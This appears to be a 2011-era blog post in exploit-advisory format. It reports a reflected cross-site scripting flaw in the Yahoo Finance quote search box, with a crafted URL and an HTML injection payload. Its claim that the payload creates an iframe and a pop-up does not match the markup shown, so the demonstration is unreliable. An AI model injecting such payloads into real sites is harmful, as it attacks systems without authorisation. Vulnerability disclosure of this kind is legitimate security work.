YAHOO FINANCE(Alexa 4th raked) cross site Scripting Vulnerability

Yahoo Finance Cross site Scripting Vulnerability.

http://www.xssed.com/mirror/73490/
Yahoo Finance XSS bug-Demo
Yahoo Finance, famous site ranked 4 by Alexa had XSS vulnerabilty in GET QUOTES
in search field.

%+         $…….#……..4………|)……..0…………\/\/
%+                                                                                                      %+
%++++++++++++++++++++++++++++++++++++++++

#Exploit Title :Yahoo finance reflected XSS vulnerability
# Vendor: www.finance.yahoo.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# Google Dork: Copyright © 2011 Yahoo! Inc

**********************************************************************************************************
BREIF DESCRIPTION
***********************************************************************************************************
Reflected XSS in yahoo finance in text field beside [GET QOTE] button.
**********************************************************************************************************
Reflected XSS Vulnerability
**********************************************************************************************************
{DEMO} : target/q?s=%22%3E%3E%3Cb%3E%3Ch1%3Eaa%3C%2Fh1%3E%3C/b%3E&ql=1EXPLOIT: “>><marquee><h1>yahoo japan</marquee>Procedure: open the link given above. Observe the text field with a button (GET QUOTES). Inject the above “EXPLOIT” to  this text field.
you can observe an iframe created and a pop up.
***********************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14–
***********************************************************************************************************Reference: http://www.xssed.com/mirror/73490/
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: